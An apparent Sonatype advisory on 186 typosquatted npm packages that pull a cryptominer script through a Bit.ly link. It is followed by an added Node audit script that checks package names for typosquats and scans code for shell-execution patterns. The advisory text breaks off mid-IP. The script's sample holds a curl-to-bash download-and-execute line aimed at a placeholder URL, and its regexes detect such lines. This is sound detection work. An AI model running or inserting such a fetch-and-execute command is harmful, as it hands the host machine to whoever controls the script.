Sonatype has discovered 186 malicious packages flooding the npm registry today. These packages infect Linux hosts with cryptominers by downloading a malicious Bash script from the threat actor's server via the Bitly URL shortener service. Our discovery follows another researcher's discovery this week of 55 PyPI packages that also pull cryptominers in an identical fashion from the same offending URL.
186 counterfeit npm packages drop cryptominers
Today, Sonatype's automated malware detection systems flagged 186 npm packages that all impersonate the heavily used http-errors JavaScript library, which gets downloaded over 50 million times a week.
The full list of the 186 packages we identified can be found in this PDF.
All of these packages were published from a pseudonymous npm account named "17b4a931."
Many of these packages are typosquats that target users of well-known libraries such as React (via the typosquat 'r2act') and QT (via the typosquat 'qtt').
The index.js file contained within these packages reveals that they do in fact pull the legitimate 'http-errors' library from npm, so as not to raise eyebrows. Still, the names of these packages are drastically different from 'http-errors', however impressive a job they do of reproducing the project's README verbatim.
Scrolling down past a few lines of code reveals some sinister activity:
On line 115, we see the packages pulling content from a Bit.ly URL and silently executing the fetched script while muting its output (via >/dev/null).
The developer behind these malicious packages has even left a snarky comment in the code, acknowledging that the malware, being a Bash script, would run on Unix-based systems only:
"if ur using windows for installing this package ur 1 lucky son of a *****"
And the Bit.ly URL redirects to the address shown below:
https://bit[.]ly/3c2tMTT => http://80.78.25[.
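The two signals in this post, a package name that sits one or two edits away from a popular library ('r2act' for React, 'qtt' for QT) and an index.js that fetches a script from a URL shortener and runs it with its output sent to /dev/null, are both cheap to check for mechanically. The Node script below is an added example written for this page; it is not Sonatype's tooling and not code from the malicious packages. It assumes the packages shell out through Node's child_process module (the post does not name the call used), and the popular-package list, shortener list and sample index.js are constructed for the demo, with a placeholder in place of the real Bit.ly link.

```javascript
// Added example, not Sonatype's code and not taken from the malicious
// packages: a small audit that checks the two signals described above.
//   1. Typosquat names: is a package name within a small edit distance of a
//      popular package name (e.g. 'r2act' vs 'react', 'qtt' vs 'qt')?
//   2. Remote execution: does the package's JavaScript shell out to fetch a
//      script from a URL shortener and run it with output sent to /dev/null?
// POPULAR, SHORTENERS and SAMPLE_INDEX_JS are constructed for this demo, and
// the child_process call in the sample is an assumption, not from the post.

const POPULAR = ['react', 'qt', 'http-errors', 'express', 'lodash'];
const SHORTENERS = ['bit.ly', 'bitly.com', 'tinyurl.com', 't.co', 'is.gd', 'cutt.ly'];

// Optimal string alignment distance: Levenshtein plus adjacent transposition,
// so 'raect' is one edit from 'react' rather than two.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Returns the popular package a name is suspiciously close to, or null.
// Short names get a tighter threshold, otherwise almost everything is
// "close" to a two-letter name like 'qt'.
function typosquatOf(name, popular = POPULAR) {
  const n = name.toLowerCase();
  if (popular.includes(n)) return null; // the real package, not a squat
  for (const p of popular) {
    const maxDist = p.length <= 4 ? 1 : 2;
    if (editDistance(n, p) <= maxDist) return p;
  }
  return null;
}

// Scans JavaScript source line by line for a child_process call or a
// curl/wget-into-shell pipeline, and records why each hit looks bad.
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((text, idx) => {
    const spawnsShell = /\b(exec|execSync|spawn|spawnSync)\s*\(/.test(text);
    const pipesToShell = /\b(curl|wget)\b.*\|\s*(ba)?sh\b/.test(text);
    if (!spawnsShell && !pipesToShell) return;
    const reasons = [];
    if (spawnsShell) reasons.push('child_process call');
    if (pipesToShell) reasons.push('download piped into a shell');
    if (SHORTENERS.some((s) => text.includes(s))) reasons.push('URL shortener hides destination');
    if (/>\s*\/dev\/null/.test(text)) reasons.push('output muted');
    findings.push({ line: idx + 1, reasons });
  });
  return findings;
}

// Combines both checks. A package is flagged when its name squats a popular
// one or when any line shows at least two of the execution indicators.
function auditPackage(name, source) {
  const squats = typosquatOf(name);
  const findings = scanSource(source);
  const suspicious = squats !== null || findings.some((f) => f.reasons.length >= 2);
  return { name, squats, findings, suspicious };
}

// Constructed sample modelled on the behaviour described in the post: the
// legitimate library is re-exported, then a shortened URL is fetched and run.
const SAMPLE_INDEX_JS = [
  "const { execSync } = require('child_process');",
  "module.exports = require('http-errors');",
  "// (shortener link below is a placeholder, not the real one)",
  "execSync('curl -s https://bit.ly/PLACEHOLDER | bash >/dev/null 2>&1');",
].join('\n');

function demo() {
  for (const pkg of ['r2act', 'qtt', 'http-errors']) {
    console.log(JSON.stringify(auditPackage(pkg, SAMPLE_INDEX_JS), null, 2));
  }
}
demo();
```

Both checks are heuristics: a legitimate package can legitimately sit one edit from a popular name, and a build script can legitimately call curl, so treat a hit as a reason to open the tarball, not as a verdict. The distance threshold scales with the target name's length because otherwise every two- or three-letter name would match 'qt'.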